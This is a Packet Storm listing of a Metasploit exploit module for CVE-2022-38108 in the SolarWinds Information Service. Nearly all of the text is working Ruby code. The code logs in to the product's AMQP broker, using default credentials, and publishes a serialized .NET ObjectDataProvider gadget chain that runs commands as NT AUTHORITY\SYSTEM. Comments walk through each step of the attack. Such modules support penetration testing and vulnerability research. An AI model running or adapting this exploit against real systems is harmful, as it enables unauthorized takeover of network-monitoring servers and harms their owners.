Packet Storm — Spencer McIntyre, Piotr B, Justin Hong, Lucas Miller (metasploit.com) — PACKETSTORM:171567
History: Mar 28, 2023 - 12:00 a.m.

SolarWinds Information Service (SWIS) Remote Command Execution

2023-03-28 00:00:00
Spencer McIntyre, Piotr B, Justin Hong, Lucas Miller, metasploit.com
packetstormsecurity.com
remote command execution
solarwinds
amqp
rce
.net deserialization
cve-2022-38108

0.031 Low

EPSS

Percentile

91.1%

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'rex/proto/amqp/version_0_9_1'  
  
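class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  # Module metadata and user options.
  #
  # The whole exploit is a single AMQP basic.publish of a serialized .NET
  # object to the 'SwisPubSub' routing key. The broker requires
  # authentication (USERNAME/PASSWORD), so from the broker's point of view this
  # is a post-authentication primitive even though the consumer runs the
  # payload as NT AUTHORITY\SYSTEM. There is no `check` method: the module
  # cannot tell a patched target from a vulnerable one before publishing.
  def initialize
    super(
      'Name' => 'SolarWinds Information Service (SWIS) .NET Deserialization From AMQP RCE',
      'Description' => %q{
        The SolarWinds Information Service (SWIS) is vulnerable to RCE by way of a crafted message received through the
        AMQP message queue. A malicious user that can authenticate to the AMQP service can publish such a crafted
        message whose body is a serialized .NET object which can lead to OS command execution as NT AUTHORITY\SYSTEM.
      },
      'Author' => [
        'Justin Hong', # vulnerability research, Trend Micro
        'Lucas Miller', # vulnerability research, Trend Micro
        'Piotr Bazydło', # vulnerability discovery, reported to ZDI
        'Spencer McIntyre' # metasploit module
      ],
      'Arch' => ARCH_CMD,
      'Platform' => 'win',
      'References' => [
        [ 'CVE', '2022-38108' ],
        [ 'URL', 'https://www.zerodayinitiative.com/blog/2023/2/27/cve-2022-38108-rce-in-solarwinds-network-performance-monitor' ],
        [ 'URL', 'https://www.solarwinds.com/trust-center/security-advisories/cve-2022-38108' ]
      ],
      'DefaultOptions' => {
        # The publish returns before the consumer ever touches the message, so
        # the session handler presumably needs a longer wait than the default.
        'WfsDelay' => 10
      },
      'Targets' => [
        [ 'Automatic', {} ]
      ],
      'DefaultTarget' => 0,
      'Privileged' => true,
      'DisclosureDate' => '2022-10-19',
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'Reliability' => [REPEATABLE_SESSION],
        'SideEffects' => [IOC_IN_LOGS]
      }
    )

    # 5671 is the TLS AMQP port; SSL defaults to true below to match it.
    # PASSWORD defaults to an empty string; nothing here guarantees the target
    # accepts that, the login result is checked at runtime in #exploit.
    register_options([
      Opt::RHOST,
      Opt::RPORT(5671),
      OptString.new('USERNAME', [true, 'The username to authenticate with', 'orion']),
      OptString.new('PASSWORD', [true, 'The password to authenticate with', ''])
    ])

    register_advanced_options(
      [
        OptBool.new('SSL', [ true, 'Negotiate SSL/TLS for outgoing connections', true ]),
        Opt::SSLVersion
      ]
    )
  end

  # "host:port" for log lines, with the host bracketed when it is an IPv6
  # literal so the port is unambiguous.
  #
  # @return [String]
  def peer
    rhost = datastore['RHOST']
    rport = datastore['RPORT']
    if Rex::Socket.is_ipv6?(rhost)
      "[#{rhost}]:#{rport}"
    else
      "#{rhost}:#{rport}"
    end
  end

  # Prefix every status line with the peer. The bare `super` (zsuper) passes
  # the *current* value of `msg`, i.e. the prefixed string.
  #
  # @param msg [String]
  def print_status(msg)
    msg = "#{peer} - #{msg}"
    super
  end

  # Authenticate to the AMQP broker, publish one poisoned message, disconnect.
  #
  # Flow: login -> channel.open -> basic.publish -> channel.close ->
  # connection.close. The message body is an ObjectDataProvider gadget chain
  # serialized with the Json.NET formatter, and the AMQP `message_type`
  # property names that same type so the consumer deserializes it as such.
  # Nothing is read back from the consumer; the only success signal is the
  # payload calling home.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when authentication fails or
  #   the broker answers with an unexpected reply / any other AMQP error.
  def exploit
    amqp_client = Rex::Proto::Amqp::Version091::Client.new(
      datastore['RHOST'],
      port: datastore['RPORT'],
      context: { 'Msf' => framework, 'MsfExploit' => self },
      ssl: datastore['SSL'],
      ssl_version: datastore['SSLVersion']
    )

    unless amqp_client.login(datastore['USERNAME'], datastore['PASSWORD'])
      fail_with(Failure::NoAccess, "Authentication failed for user #{datastore['USERNAME']}.")
    end
    print_status('Successfully connected to the remote server.')

    channel = amqp_client.channel_open
    vprint_status('Successfully opened a new channel.')
    channel.basic_publish(
      routing_key: 'SwisPubSub',
      message: ::Msf::Util::DotNetDeserialization.generate(
        payload.encoded,
        gadget_chain: :ObjectDataProvider,
        formatter: :JsonNetFormatter
      ),
      properties: {
        message_type: 'System.Windows.Data.ObjectDataProvider'
      }
    )
    print_status('Successfully published the message to the channel.')

    channel.close
    amqp_client.connection_close
  rescue Rex::Proto::Amqp::Error::UnexpectedReplyError => e
    fail_with(Failure::UnexpectedReply, e.message)
  rescue Rex::Proto::Amqp::Error::AmqpError => e
    fail_with(Failure::Unknown, e.message)
  ensure
    # If Client.new itself raised, amqp_client is still nil here; guard so a
    # NoMethodError from cleanup does not mask the original failure (the
    # fail_with calls above re-raise through this ensure as well).
    amqp_client.close if amqp_client
  end
end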
`
